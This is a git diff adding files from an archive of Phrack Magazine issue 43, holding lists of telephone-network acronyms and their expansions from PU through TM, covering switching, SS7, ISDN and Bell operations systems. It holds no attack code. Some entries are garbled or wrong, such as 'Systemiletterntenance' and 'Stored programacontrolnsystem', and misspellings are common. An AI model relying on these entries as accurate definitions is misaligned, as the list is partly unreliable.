+PU           Power units
+PU           Power up (C/I channel code)
+PUC          Peripheral unit controller
+PUC          Public utilities commission
+PULS         Message-rate pulsing table (AMA NTI)
+PULS         Pulse
+PULSG        Pulsing
+PUM          Pu mode
+PUMPHW       Pump hardware errors
+PV           Protective relaying-telegraph grade INTER/TRA blocal 1-26
+PVC          Permanent virtual circuit
+PVC          Permanent virtual circuit (x.25 network)
+PVC          Permanent virtual circuits
+PVN          Private virtual network
+PVT          Private
+PW           Protective relaying-signal grade INTER/TRA blocal 1-26
+PWC          Premis wire center
+PX           Pbx station line INTER/TRA blocal 1-26
+PX           Power cross.
+PZ           Msc constructed circut INTER/TRA blocal 1-26
+Q            Report class.  see table 5-1.
+Q-CIF        Quarter cif (for ISDN low end video)
+QAM          Quadrature-amplitude modulation
+QANN         Announcements for queuing (MLHG)
+QAS          Quasi-associated signaling
+QEX          Question an execution
+QMLHG        Queuing for multi-line hunt group
+QMP          Quality measurement plan
+QPA          Quality program analysis
+QRSS         Quasi random signal source
+QS           Packet synchronous access line INTER/TRA blocal 1-26
+QSC          Quad s interface circuit     peb2084
+QSF          Queuing for simulated facility
+QSS          Quality surveillance system
+QTAM         Queued telecom access method
+QTG          Queuing for trunk groups
+QU           Packet asyncronous access line INTER/TRA blocal 1-26
+QUE          Queue
+R            Initials and location of person reporting this trouble.
+R            Review pending dispatch
+R            Ring
+R&R          Rate & route
+R&SE         Research & systems engineering
+R-GRD        Ring-to-ground
+R-T          Ring-to-tip
+R/O          Read/only
+R/W          Read write
+R/WM         Read/write memory
+R1           Regional signaling system 1 (based on CCITT SS5 (2600))
+R2           Regional signaling system 2 (based on CCITT SS4 (2400))
+RA           Rate adaption
+RA           Ready access
+RA           Remote attendant INTER/TRA blocal 1-26
+RACF         Remote activated call forwarding
+RAD          Receive adress
+RAF          Recorded announcement facility
+RAF          Recorded announcement function
+RAF          Recorded announcement function (DSU2)
+RAL          Relay assignment list
+RAM          Random access memory
+RAM          Random-access memory
+RAND         Rural area network design
+RAO          Regional accounting office
+RAO          Revenue account office
+RAO          Revenue accounting office
+RAP          Recorded announcement port.
+RAP          Relay assignment parameters
+RAP          Rotary assignment priority
+RAR          Return address register
+RAS          Release sequence number lists and related TN/OE
+RAS          Remote access services
+RASC         Residence account service center
+RAT          Rating
+RATDBOV      RATE message received indicating data base overload
+RATDBUN      RATE message returned because data base unable to process
+RATGMSG      RATE message received garbled
+RATNBLK      RATE message returned because of network blockage
+RATNCON      RATE message returned because of network congestion
+RATNRTE      RATE message returned because of no routing data
+RATTOUT      RATE message returned because of timeout
+RATUNEQ      RATE message returned because of unequipped destination
+RATURPY      RATE message received with an unexpected reply
+RAU          RSM alarm
+RBEF         Read block error counter for far end (IOM2 monitor command)
+RBEN         Read block error counter for near end (IOM2 monitor command)
+RBHC         Regional bell holding company
+RBOC         Regional bell operating company
+RBOC         Regional boc
+RBOR         Request basic output report
+RBS          Print tbs relays assignment record
+RC           Rate center  (NTI)
+RC           Recent change
+RC           Regional center
+RC           Resistance-capacitance
+RC/V         Recent change and verify
+RC18         Rc message response - 1AESS RC
+RCC          Radio common carrier
+RCC          Remote cluster controller
+RCC          Request corrupted CRC (in EOC)
+RCC          Reverse command channel
+RCD          Received
+RCE          Ring Counter Error
+RCF          Remote call forward
+RCF          Remote call forwarding
+RCFA         Remote call forwarding appearance (NTI)
+RCI          Read controller interface (IOM2 monitor command)
+RCL          Route clock
+RCLDN        Retrieval of calling line directory number
+RCLK         Remote clock
+RCM          Remote carrier module
+RCMAC        Recent change memory administration center
+RCMG         Recent change message generator
+RCOSC        Remote clock oscillator
+RCOXC        Remote clock oscillator cross couple
+RCP          Recent change packager
+RCP          Remote copy
+RCR          Recent change report
+RCRE         Receive corrected reference equivalent
+RCREF        Remote clock reference
+RCS          Recent change summary
+RCSC         Remote spooling communications subsystem
+RCT          Remote concentrator terminal
+RCU          Radio channel unit
+RCU          Repeater control unit (i.e. ASIC between two IEC-q2s)
+RCV          Receive
+RCVR         Receiver
+RCW          Recent change keyword
+RCXC         Remote clock cross couple
+RDATE        Release date (update database date)
+RDB/RDR      Recent Disconnect bussiness/resid.
+RDBM         Relational data base management
+RDES         Remote data entry system
+RDFI         RSM digital facilities interface
+RDG          Message register reading
+RDS          Radio digital system
+RDS          Reference distribution system
+RDS          Running digital sum
+RDSN         Region digital switched network
+RDT          Radio digital terminal
+RDT          Remote digital terminal
+RDY          Resynchonisation indication after loss of framing (C/I channel CO)
+RE           Lajrr
+RE           Radiated emission (EME)
+REACC        Reaccess
+REC          Record
+REC          Recreate (display)
+REC          Regional engineering center
+RED          Recent change message text editor
+REH          Recovered history
+REJ          Reject (LAP-D command/response)
+REL          Release (i.451)
+REL          Release non-intercepted numbers by release date
+REM          Remote equipment module
+REM          Remove frame locations
+REMOBS       Remote observation system
+REMSH        Remote shell
+REN          Ring equivalence number
+REOC         Real estate operations center
+REP          Reprint option
+REPT#        Report number
+REQ          Required
+RES          Reset (C/I channel code)
+RES          Resistance
+RES          Resume (i.451)
+RES          Send a solicited response
+RES1         Reset receiver (C/I channel code)
+RET          Retermination of frame locations
+REV          Reverse charging (i.256 c)
+REV          Reversed
+REW          Rework status
+REX          Reexecute a service order
+REX          Routine exercise.
+REX          Routine exerciser.
+REXX         Restructred extended executer language
+RF           Radio frequency
+RFI          Radio frequency interference
+RID          Read identification (IOM2 monitor command)
+RID          Remote isolation device
+RISLU        Remote integrated services line unit
+RJ           Reject
+RJDT         Reject date
+RJR          Remove jeopardy reason codes
+RJR          Valid reject reasons
+RKW          (ger pcm30) fas
+RL           Repeat later
+RL           Resistance lamp
+RL           Retry later
+RL           Return loss
+RLC          Release complete msg. (SS7: in SCCP)
+RLCM         Remote line concentrating module
+RLDT         Release date
+RLF          Re-using dips upper bound load factor
+RLG          Release guard on unstable call (outgoing)
+RLI          Remote link interface
+RLM          Remote line module
+RLO          Automatic relay assignment present
+RLOGIN       Remote login
+RLS          Release
+RLSD         Released msg. (SS7: in SCCP)
+RLST         Release status
+RLT          Remote line test
+RLT          Remote loop test
+RLY          Miscellaneous relay
+RM           Remark
+RMA          Request for manual assistance
+RMAC         Remote memory administration center
+RMAS         Recent message automatic system
+RMAS         Remote memory administration
+RMAS         Remote memory administration system
+RMK          Hunt group remarks
+RMK          Remarks
+RMK          Remarks on cable pair
+RMK          Remarks on office equipment
+RMK          Remarks on orders
+RMK          Remarks on telephone number
+RMM          Remote maintenance module
+RMP          Recent change punctuation table
+RMPK         Remote shelf
+RMR          Remote message registers
+RMS          Remote mean square
+RMS          Root-mean-square
+RMS-D        Remote measurment system-digital
+RMS-D1       Remote measurment system-digital signal level one
+RMS-D1A      Remote measurment system-digital signal level one access
+RMS-M        Remote measurment system-metallic (through SMAS)
+RMS-MS       Remote measurment system-metallic small (through SMAS)
+RMV          Remove
+RMV          Removed from service - 1AESS remove
+RN           Reference noise
+RN           Ring node
+RNA          Release telephone numbers for assignment
+RNG          Ringing
+RNGS         Rings
+RNMC         Remote network management center
+RNO          Rss subentity number
+RNOC         Regional network operations center
+RNR          Receive not ready (LAP-D command/response)
+RO           Receive only
+RO           Routine other.
+ROB          Remote order buffer
+ROC          Regional operating company
+RODD         Redundant ODD
+ROE          Reservation order establishment
+ROE          Rss's office equipment
+ROH          Receiver off hook
+ROI          Reservation order inquiry
+ROK          Republic of korea
+ROM          Read-only memory
+ROOT         System manager for some unix os and COSMOS
+ROP          Receive-only printer
+ROSE         Remote operation service element (TCAP subset)
+ROTF         Operational trouble.
+ROTL         Remote office test line
+ROTLS        Remote office testline system
+ROUT         Routes
+ROW          Reservation order withdrawal
+RP           Repeater
+RPFC         Read power feed current value (IOM2 monitor command)
+RPM          Recent change parameters
+RPO          Regional procurement organization
+RPOA         Recognized private operating agency
+RPT          Repeated
+RPT          Report
+RQ           Rpntr
+RQS          Rate/quote system
+RQSM         Regional quality service management
+RQST         Request
+RR           Receive ready (LAP-D command/response)
+RRCLK        Remote clock circuit pack
+RRO          Reports receiving office
+RS           Radiated susceptibiltiy (EMS)
+RS           Record separator (ascii control)
+RS           Repair service
+RS           Reset
+RSA          Repair service attendant
+RSAT         Reliability and system architecture testing
+RSB          Repair service bureau
+RSB          Repair servicenbureauem
+RSC          Remote switching center
+RSC          Reset confirm (SS7: in SCCP and ISUP)
+RSC          Residence service center
+RSCS         Remote source control system
+RSE          Remote service equipment
+RSHF         Remote concentration line shelf
+RSIT         Remote site
+RSLC         Remote subscriber line module controller
+RSLE         Remote subscriber line equipment
+RSLM         Remote subscriber line module
+RSM          Remote switching module
+RSS          Remote switching system
+RST          Reset received (outgoing)
+RST          Resistance test
+RST          Resistance test (SARTS command)
+RST          Restore
+RST          Restored to service status - 1AESS restore
+RSTS/E       Resource system time sharing/enhanced
+RSU          Remote switching unit
+RSY          Resynchronizing (C/I channel code)
+RSYD         Rsy downstream
+RSYU         Rsy upstream
+RT           Radio landline INTER/TRA blocal 1-26
+RT           Remote terminal
+RT           Remote terminal (opposite to cot)
+RT04         Status of monitors - ringing and tone plant-1AESS
+RTA          Remote trunk arrangement
+RTA          Remote trunking arrangement
+RTAC         Regonal Technical Assitance Center
+RTAC         Remote a trunk assembler center
+RTB          Retransmission buffer
+RTCA         Radio technical commission of aeronautics
+RTEST        Tops remote test
+RTF          Release timeout failure
+RTH          Report transaction to count spare and diped line equipment
+RTI          Route index
+RTIME        Release time (update database time)
+RTL          Resistor-transistor logic
+RTM          Regional telecommunications management
+RTM          Remote test module
+RTN          Return to normal (in EOC)
+RTOC         Resident telephone order center
+RTP          Rate treatment package
+RTP          Remote test point (RTS-5A)
+RTPP         Remote test port panel
+RTR          Route TReatment (GTE)
+RTRV         Retrieve
+RTS          Relay and telephone number status report
+RTS          Remote test unit
+RTS          Remote testing system
+RTS          Request to send
+RTS          SMAS remote test system located in central offices
+RTSE         Reliable transfer service element
+RTSI         Receive time slot interchanger
+RTU          Remote trunking unit
+RTU          Right to use
+RTZ          Rate zone
+RU           Receive unit
+RUM          Remote user multiplex
+RUP          Request unsolicited processing
+RV           Review
+RVDT         Review date and time
+RVPT         Revertive pulsing transceiver
+RVPT         Revertive pulsing transceivers
+RW           Read/write permission
+RWC          Remote work center
+RX           Remote exchange
+RZ           Resistance zone
+RZ           Return to zero
+RxSD         Receive serial data
diff --git a/phrack43/25.txt b/phrack43/25.txt
new file mode 100644
index 0000000..4058928
--- /dev/null
+++ b/phrack43/25.txt
@@ -0,0 +1,1095 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 25 of 27
+
+                               {Acronyms Part V}
+
+S            Date and time report received.
+S            Seconds
+S            Send toscreener
+S            Sleeve
+S            Start dial signal
+S&E          Service & equipment
+S-           Supervisory (S-frames)
+S-N          Signal-to-noise ratio
+S/R          Send/receive key
+S1DN         Stage one distribution network
+S96          SLC 96
+SA           Sattelite trunk INTER/TRA blocal 1-26
+SA01         Call store memory audit results - 1AESS software
+SAA          System applications architecture (for ps/2)
+SABME        Set asynchronous balanced mode (ABM) extended (LAP-D command)
+SAC          Service access connector (-> sipb)
+SAC          Service area computer
+SAC          Special area code
+SAC          Switch activation
+SAD          System access delay
+SAG          Street address guide
+SAI          S activity indicator (in EOC)
+SAI          Serving area interface
+SAI          Summary of action items
+SALI         Standalone automatic location identification
+SAM          Subsequent address msg. (SS7: in ISUP)
+SAMA         Step by step automatic message accounting
+SAMEM        Stand-alone billing memory
+SANE         Signaling area/network code (SS7)
+SAP          Service access point
+SAPI         Service access point identifier
+SAR          Store address register
+SARTS        Switch access tremote test system
+SARTS        Switched access remote test system
+SAS          Switched access service
+SASWF        Save all seems well failure flip flop
+SAT          Special access termination
+SAT          Supervisory audio tone
+SAT          System access terminal
+SAW          Surface acoustic wafe (filter)
+SB           Switched access-standard-service code for LATA access
+SBC          S bus interface circuit
+SBCX         SBC extended
+SBI          Synchronous backplane interconnect
+SBLN         Standby line
+SBMS         Southwestern bell mobile service
+SBS          Skyline business systems
+SBUC         S bus connector
+SC           Scanner controller
+SC           Sectional center
+SC           System controller
+SC/SD        Scan and signal distributor
+SCA          Service order completion-automatic
+SCANS        Software change administration and notification system
+SCAT         Stromberg-carlson assistance team
+SCC          Specialized common carrier
+SCC          Station cluster controller
+SCC          Switching control center
+SCC          Switching control center.
+SCCP         Signaling ccp (SS7: q.71x)
+SCCP         Signaling connection control part
+SCCS         Specialized common carrier service
+SCCS         Switching control center system
+SCF          Selective call forwarding
+SCF          Simple completion for mdf
+SCH          Test scheduale (command)
+SCHED        Scheduled
+SCI          Spare cable pair inquiry
+SCL          Station clock
+SCLK         Slave clock
+SCM          Scramble coder multiplexer
+SCM          Standard completion by mdf
+SCM          Subscriber carrier module
+SCM          Subscriber carrier module (DMS-1 digital pair gain system NTI)
+SCO          Serving central office
+SCOT         Stepper central office tester
+SCOTS        Surveillance & control of transmissions system
+SCP          Service control point
+SCP          Service order completion by LAC
+SCP          Signal control point
+SCP          Signal conversion point
+SCP          System control program
+SCPC         Signal channel per carrier
+SCPD         Supplementary central pulse distributor
+SCR          Selective call rejection
+SCR          Signaling configuration register
+SCR          Standard completion by rcmac
+SCRC         Send corrected reference equivalent
+SCRN         Screening translations
+SCS          SCM-10S Shelf (SLC-96)
+SCS          SCM-10S shelf (SLC-96)
+SCSDH        Scanner and signal distributor handler
+SCU          Selector control unit
+SCX          Specialized communications exchange
+SD           Slip detected
+SD           Switched access-improved-service code for LATA access
+SD&D         Specific development & design
+SDACS        Serving digital accessed and cross-connect system
+SDC          Sales development center
+SDD          Site dependent data
+SDDF         Subscriber digital distributing frame
+SDE          Submission/delivery entity (x.400)
+SDIS         Switched digital integrated service
+SDL          Specification and description language
+SDLC         Synchronous DLC
+SDLC         Synchronous data link control
+SDLH         Synchronous data link handler
+SDM          Space division multiplex
+SDN          Software defined network
+SDN          Software-defined network
+SDNBAS       Call failed due to the query's being blocked at the switch
+SDNBN        Call failed due to the query's being blocked in the CCS network
+SDNGTCAP     Garbled TCAP message received
+SDNNCANI     CAMA call failed due to CAMA trunk's not providing ANI for
+               query
+SDNNCFA      Call failed while the transaction with the NCP was active
+SDNNCFI      Call failed while the transaction with the NCP was inactive
+SDNNOCANI    CAMA call failed due to CAMA trunk's not providing ANI
+               through ONI for query
+SDNRER       Call failed because to the conversation with the NCP
+               resulted in a return error
+SDNRER       Call failed because to the conversation with the NCP
+               resulting in a return error
+SDNRR        Call failed because to the conversation with the NCP
+               resulted in a reject respon
+SDNRR        Call failed because to the conversation with the NCP
+               resulting in a reject respo
+SDNTIM       Call failed due to the query's not being answered in
+               time by the NCP
+SDNTRF       Call failed due to the NCP's answering with a terminate request
+SDOC         Selective dynamic overload controls
+SDP          Service delivery point
+SDP          Submission and delivery protocol (x.411)
+SDPT         Signal distribution points
+SDR          Store data register
+SDR          Switch data report
+SDS          Switched data service
+SDS          Synchronous data set
+SDSC         Synchronous data set controller
+SDT          Software development tools
+SE           Special access wats-access-std-service code for LATA access
+SE           Special service equipment number
+SEAS         Signaling engineering and administration system
+SEAS         Signalling engineering and administration systems
+SEC          Second
+SEC          Signal level behind the echo canceller (C/I channel code)
+SEE          Systems equipment engineering
+SEG          Segment
+SEL          Digital selector (in TMS)
+SEL          Selecting lines for an exchange class of service study
+SER#         Seral number
+SES          Service evaluation system
+SES          Unk    (administrative system)
+SET          Statistics on equipment and telephone numbers
+SET          Strategy execution table
+SF           Service field
+SF           Signal format
+SF           Single frequency.
+SF           Special access- WATS access line improved-service code for LATA
+SF           Status field (SS7)
+SFB          Set next febe to zero
+SFD          Superframe detected (C/I channel code)
+SFG          Simulated facilities
+SFG          Simulated facilities group
+SFG          Simulated facility group
+SFG          Simulated facility group (SFG) measures.
+SFMC         Satellite facility management center
+SFN          Simulated facility number
+SFV          Signal format verification
+SFV          Signaling format verification (SARTS command)
+SG           Control/remote metering signal grade INTER/TRA blocal 1-26
+SG           Supergroup
+SG           Switch group (SG) (also known as half-grid)
+SGC          Switching group control
+SGD          Failure to receive station group designator (SGD)
+SGH          Select graphic rendition (teletex)
+SGH          Supply relays for groups of 5xb hunts
+SGL          Single
+SGML         Standard generic markup language
+SGMP         Simple gateway management protocol
+SGN          Common language segment number
+SHI          Select horizontal spacing (teletex)
+SI           Sequenced information
+SI           Service indicator
+SI           Shift in (ascii control)
+SI           Status indicator
+SI           Synchronous interface
+SIC          Silicon integrated circuit
+SICOFI       Signal processing codec filter
+SICOFI2      2 channel sicofi
+SID          System identification
+SIDB         Session information data base
+SIDES        Siemens ISDN software development and evaluation system
+SIF          Signaling information field (SS7)
+SIG          Signaling
+SIG          Signaling equipment (in a trunk)
+SIGI         Sigi
+SIGS         Signaling strobe
+SILC         Selective incoming load control
+SILC         Selective incoming load controls messages.
+SIM          System integrity monitor
+SIN          Status indication normal alignment
+SIO          Service information octet (SS7)
+SIP          Serial interface port
+SIPB         Siemens ISDN pc user board
+SIPB 5XXX    SIPB modules
+SIPB 7XXX    SIPB configurations
+SIPMOS       Siemens PMOS
+SIPO 6XXX    Siemens ISDN pc software object code
+SIPS 6XXX    Siemens ISDN pc software source code
+SIR          Sorting inquiry by range
+SIS          Special identifying telephone number supplement
+SIT          Special identifying telephone number
+SIT          Special information tones
+SITAC        Siemens isolated thyristor AC
+SITE         Site assignments
+SITEST       Siemens ISDN protocol software test tools
+SIU          Subscriber line interface unit
+SJ           Limited switched access line-service code for LATA access
+SK           Skip
+SK           Skip option
+SL           Secretarial line INTER/TRA blocal 1-26
+SL           Subscriber line
+SLA          Subscriber line adress
+SLB          Subscriber line busy
+SLC          Signaling link code (SS7)
+SLC          Subicer loop carrier
+SLC          Subscriber line counts for custom calling features
+SLC          Subscriber loop carrier
+SLD          Subscriber line data (bus)
+SLE          Screen list editing
+SLE          Screening line editor
+SLEN         SLC line equipment number
+SLIC         Subscriber line interface circuit
+SLIM         Subscriber line interface module
+SLIM         Subscriber loop interface module
+SLK          Signaling link
+SLM          Subscriber line module
+SLMA         SLM analog
+SLMD         SLM digital
+SLPK         SLC-96 pack
+SLRF         Systemiletterntenance results feature (eadas)
+SLS          Signaling link selection (SS7)
+SLSN         Unk  COSMOS
+SLU          Special studies
+SM           Same
+SM           Sampling INTER/TRA blocal 1-26
+SM           Service module
+SM           Speech memory
+SM           Switch module
+SM           Switching modual
+SM           Switching module
+SM           Synchronous multiplexor
+SMAC         Service and maintance administration center
+SMAS         Switched maintance access system
+SMAS         Switched maintance access system (provides access to the
+              RMS-M and RTS)
+SMASF        SMAS frame
+SMASPU       SMAS power unit
+SMD          Surface mounted device
+SMDF         Subscriber main distributing frame
+SMDI         Subscriber message desk interface
+SMDR         Station message detail record
+SMDR         Station message detail recording
+SMDR         Station message detailed recording
+SMDS         Switched multi-megabit data service
+SMF          Sub multi frame
+SMG          Supermastergroup
+SMM          SARTS maintence manager (VAX 1/780)
+SMP          SARTS maintance position (TP 52a)
+SMPU         Switch Module Processor Unit
+SMS          Service management system
+SMS          Station management systems
+SMS          Switching Module System
+SMSA         Standard metropolitan statistical area
+SMTP         Simple mail transfer protocol
+SMU          Subscriber module urban
+SMU          System master unit
+SN           Sequence number
+SN           Special access termination INTER/TRA blocal 1-26
+SNA          System network architecture (IBM)
+SNA          Systems network architecture
+SNADS        System network architecture distribution service
+SNET         Southern new england telephone
+SNF          Serial number format
+SNL          Signaling link  (CCS7)
+SNLS         Signaling link set (CCS7)
+SNRS         Signaling network route set (CCS7)
+SNS          Service network system
+SO           Service order
+SO           Shift out
+SOAC         Service order analysis and control
+SOB          Service observing assignments
+SOB          Service observing tag
+SOC          Service order cancel
+SOC          Service oversight center
+SOCC         Standard optical cable code
+SOCC         Switching operation control center
+SODC         Service order delayed completion
+SOE          Service order establishment
+SOE          Standrard operating environment
+SOF          Service order fix
+SOH          Service order history
+SOH          Service order withheld
+SOH          Start of header
+SOI          Service order assignment inquiry
+SOI          Service order image
+SOL          Service order listing
+SOM          Modify a pending service order
+SONAR        Service order negotiation and retrieval
+SONDS        Small office network data system
+SONET        Synchronous optical network
+SORD         Service order dispach
+SOW          Service order withdrawal
+SP           Signal p
+SP           Signal point (switching office in SS7)
+SP           Signal processing
+SP           Signal processor
+SP           Signaling point
+SP           Stimulus protocol
+SPA          Special access
+SPACE        Service provisioning and creation environment
+SPAN         Space physics analysis network
+SPAN         System performance analyzer
+SPARED       Line involved in ISLU sparing configuration.
+SPC          Signaling poiny code (SS7)
+SPC          Southern pacific communications
+SPC          Stored program control
+SPC          Stored program controlled
+SPCR         Serial port control register
+SPCS         Stored program control system
+SPCS         Stored programacontrolnsystem
+SPCS COER    Stored-program control system/central office equipment
+              report
+SPCSS        Stored program control switching system
+SPD          Speed
+SPDA         Supplier data program
+SPFC         Special purpose function code
+SPH          Session protocol handler
+SPI          Serial peripheral interface
+SPINT        Signal processor interrupt
+SPL          Split
+SPM          Split and monitor
+SPM          Split and monitor (SARTS command)
+SPOC         Single point of contact
+SPS          Split and supervise
+SPS          Split and supervise (SARTS command)
+SPUC/DL      Serial peripheral unit controller/data link
+SQ           Equipment only-customer premises INTER/TRA blocal 1-26
+SQA          Simulated facility group (SFG) announcement (SAQ)
+SQD          Signal quality detector
+SQL/DS       Structured query language/data system
+SRA          Selective routing arrangement
+SRAM         Static ram
+SRCF         Single line remote call forward
+SRDC         Subrate data cross connect
+SRDM         Subrate data multiplexer
+SRI          Subscriber Remote Interface (RLCM)
+SRI          Subscriber Remote Interface pack
+SRL          Singing return loss
+SRV          Service
+SRVT         SCCP Routing Verification Test
+SS           Dataphone select-a-station INTER/TRA blocal 1-26
+SS           Signaling system
+SS           Special services
+SS7          Signaling system #7 (ccitt)
+SSA          Special service automation
+SSAS         Station signaling and announcement subsystem
+SSB          Single-sideband
+SSB          Switched services bureau
+SSBAM        Single-sideband amplitude modulation
+SSC          Specal service center
+SSC          Special service center
+SSC          Special services center
+SSC          Standard speech circuit     psb4500/-1
+SSCP         Subsystem services control point
+SSD          No second start dial wink
+SSD          No second start dial wink (MDII)
+SSDAC        Specal services dispach administration centers
+SSF          Sub service field
+SSI          Serial signal interface
+SSN          Subsystem number
+SSN          Switched service network
+SSO          Satellite switching office
+SSO          Satellite switching office assignments
+SSP          Send single pulses (C/I channel code for test mode)
+SSP          Service switching point
+SSP          Service switching points
+SSP          Signal switching point
+SSP          Sponsor selective pricing
+SSP          Switching service points
+SSP          System status panel
+SSPC         Ssp controller
+SSPRU        Ssp relay unit
+SSTR         Selective service trunk reservation (SSTR).
+SSTR         Service selective trunk reservation
+SSTTSS       Space-space-time-time-space-space network
+SSWAP        Switching services work allocation precedures (GTE)
+ST           A signal that indicates the end of mf pulses (stop)
+ST           Present status of telephone number
+ST           Self test request nt (IOM2 monitor message)
+ST           Start
+ST           Subscriber terminal
+STA          Station sset
+STAB         Station abbreviation file
+STARS        Sampled traffic analysis and repo ts systems
+STATMUX      Statistical multiplexer
+STB          Standby
+STC          Service test center
+STC          Serving test center
+STC          Switching technical center
+STCR         Syncron transfer control register
+STD          Standard
+STD          Subscriber trunk dialing
+STDM         Statistical time division multiplexing
+STEP         Services testing evolution platfoem
+STEP         Sides static test of IOS and mf on board (in sitest)
+STKE         Stack protect error
+STLWS        Supplementary trunk and line work station
+STM          Synchronous transfer mode
+STN          Station definition
+STN          Summarize telephone numbers
+STOR         Memory storage
+STORY        Screening tool for report files (IOS)
+STP          Self test pass (IOM2 monitor message)
+STP          Signal transfer point
+STP          Signal transfer point (SS7)
+STP          Stop
+STRAT        Strategy
+STS          Shared tenant service
+STS          Space-time-space network
+STS          Space-time-space switch (TMS-TSI-TMS)
+STS          Station signaling
+STS          Station signaling test (SARTS command)
+STS          Steered tenant service
+STS          Synchronous transport signal
+STS 2060     Sicofi software
+STT          Telephone number status
+STTP         Supplementalstrunkntest panel
+STTP         Supplementary trunk test panel - trunk testing position (1ess)
+STU 2000     Stand alone ISDN user board
+STU 2040     Stand alone MTS user board
+STU 2050     Stand alone PBC user board
+STU 2060     Stand alone SICOF user board
+STUDIALO     PC software for STU 2xxx
+STX          Start of test
+STX          Start of text
+SU           Signaling unit
+SU           Syndes units (syncronizers-dessyncronizers)
+SU5IN        Subunit 5 interrupt
+SU6IN        Subunit 6 interrupt
+SU7IN        Subunit 7 interrupt
+SUB          Sub switch
+SUB          Sub-addressing (i.251)
+SUB          Substitute character (teletex)
+SUBL         Sublet service
+SUERM        Su error rate monitor
+SUFX         Sufix
+SUM1         Summary screen
+SUP          Supervision
+SUS          Suspend (SS7: in ISUP)
+SUSP         Suspend (i.451)
+SV           Slave
+SV           Switched voice
+SVB          Serving bureau
+SVC          Critical service circuits
+SVC          Switched virtual circuit
+SVC          Switched virtual circuits
+SVL          Service observing loops
+SVP          Surge voltage protector  various
+SVS          Select vertical spacing (teletex)
+SVS          Switched voice service
+SW           Switch name
+SW           Switched
+SWB          Southwestern bell
+SWC          Same wire center
+SWC          Set work code
+SWEQF        Switch equipment failure.
+SWFC         Sliding-window flow control
+SWFN         Switch function file
+SWG          Sub working group
+SWS          Switch work station
+SWS          Switched signaling
+SWS          Switching signal test (SARTS command)
+SWST         Switch signature table
+SX           Simplex (mode is a PT TR connected togeather)
+SX           Simplex signaling
+SXS          Step by (X) step
+SYC          System control
+SYN          Synchronous idle
+SYNDES       Synchonizer/dessynchonizer
+SYP          Synchronisation pulse
+SYS          Machine number
+SYS          System
+SYS          System manager
+SYSGEN       System generation
+SZD          Seized
+SxS          Step-by-step or strowger switch
+T            Double wire pair
+T            Intials of person receiving report.
+T            Terminaltion
+T            Tip
+T&A          Toll and assistance
+T&L          Termination
+T&M          Talk-and-monitor
+T&R          Tip and ring
+T&R          Two wire phone connection
+T-           Transportfunction-
+T-BERD       T-carrier Bit Error Rate Tester
+T-GRND       Tip-ground
+T1/OS        T1 carrier outstate
+T1FE         T1 carrier front end
+TA           Tandem tie-trunk INTER/TRA blocal 1-26
+TA           Terminal adaption
+TA           Terminal adaptor
+TA           Transfer allowed
+TA           Transfer assembly
+TAB          Telephone ability battery
+TAC          Technical assistance center
+TAC          Tei assignment control (IOS)
+TAC          Terminal access circuit
+TAC          Test and access circuit
+TACD         Telephone area code directory
+TAD          Test access digroup
+TAG          Translation administration group
+TAI          Tie pair assignment inquiry
+TAN          Technation access network
+TAN          Test access network
+TAP          Telephone assistance plan
+TAP          Teletex access protocol (x.430: p5)
+TAP          Test access path
+TAP          Touchtone assignment priority number
+TARE         Tariff table (AMA NTI)
+TAS          Telephone answering service
+TASC         Technical assistance service center
+TASC         Telecommunications alarm and surveillance control
+TASC         Telecommunications alarm surveillance and control system
+TASI         Time assignment speech interpolartion
+TASI         Time assignment speech interpolation system
+TAT          Test access trunk
+TAT          Test alignment of frame terminal
+TAT          Transatlantic telephone
+TATS         Trouble analysis of transmission and signaling
+TAU          Time assignment unit
+TBL          Trouble
+TC           Control/remote metering-telegraph grade INTER/TRA blocal 1-26
+TC           Timing counter
+TC           To cable
+TC           Toll center
+TC           Transaction capabilities
+TC15         Reports overall traffic condition - 1AESS traffic condition
+TCA          Telephone company administration
+TCAP         Telecommunications alarm surveillance
+TCAP         Transaction (ie sdngtcap)
+TCAP         Transaction capabilities application part
+TCAP         Transaction capabilities applications port
+TCAS         T-carrier administration system
+TCAS         T-carrier administration system)
+TCAS         T-carrier administrative system
+TCC          Toll control center
+TCC          Trunk class code
+TCG          Test call generation
+TCIF         Telecommunications industry forum
+TCM          Time compression multiplexer
+TCM          Trellis coded modulation
+TCP          Transport control protocol (DOD)
+TCR          Transient call record
+TCS          Terminating code screening
+TCSP         Tandem cross section program
+TCU          Timing control unit
+TD           Test direction
+TD           Tone decoders
+TDAS         Traffic data administration system
+TDAS         Translation data assemblern system
+TDC          Tape data controller
+TDC          Telex destination code (ISO 7498)
+TDC          Terrestrial data circuit
+TDD          Telecommunications device for deaf
+TDF          Trunk distributing frame
+TDM          Time division multiplex
+TDMA         Tdm access
+TDRS         Traffic datatrecorderasystem
+TE           Terminal equipment
+TE           Transit exchange (contains PSF)
+TE           Transverse electric
+TED          Text editor
+TEHO         Tail end hop off
+TEI          Terminal endpoint identifier
+TELEX        Teleprinter exchange
+TELNET       Virtual terminal protocol
+TELSAM       Telephone service attitude measurement
+TEN          Trunk equipment number
+TER          Terminal
+TERM         Terminate
+TERM         Terminating
+TEST         In test mode.
+TET          Display or change band filter file
+TF           Telephoto/facsimile INTER/TRA blocal 1-26
+TFC          Transfer frame changes
+TFLAP        T-carrier fault-locating application program
+TFS          Trunk forecasting system
+TFTP         Television facility test position
+TG           Tip-to-ground
+TG           Translation guide
+TGC          Manual trunk group controls messages.
+TGC          Terminal group controller
+TGID         Trunk group id
+TGMEAS       Basic trunk group measurements
+TGN          Trunk group number
+TH           Trouble history
+THGP         Thousands groups
+THL          Trans hybrid loss
+TI           Test indication
+TIA          Telephone information access
+TIC          Telecom ic (IOM-bus)
+TICOM        Treated interface common circuit.
+TIDE         Traffic information distributor & editor
+TIG          Dial transfer input generator
+TIM          Timing
+TIMEREL      Time release
+TINTF        The T interface is down.
+TIP          The installation practices
+TIRKS        Trunk integrated record keeping system
+TK           Local PBX trunk INTER/TRA blocal 1-26
+TK           Trunk cable and pair number
+TKT          Trouble ticket file
+TL           Non-tandem tie trunk INTER/TRA blocal 1-26
+TL           Test line
+TL02         Reason test position test was denied - 1AESS traffic
+TLC          Tail COSMOS
+TLC          Translate lanavar/CPS
+TLI          Telephone line identifier
+TLK          Talk
+TLM          Trouble locating manual
+TLN          Trunk line network
+TLP          Transmission level point
+TLPU         Telecommunications line processor unit
+TLS          Tail switch
+TLTP         Trunk line and test panel
+TLTP         Trunk line testrpanelng frame
+TLWS         Trunk and line work station
+TM           Testmode
+TM           Transverse magnetic
+TM           Trasfer modus
+TM           Trunk mantance
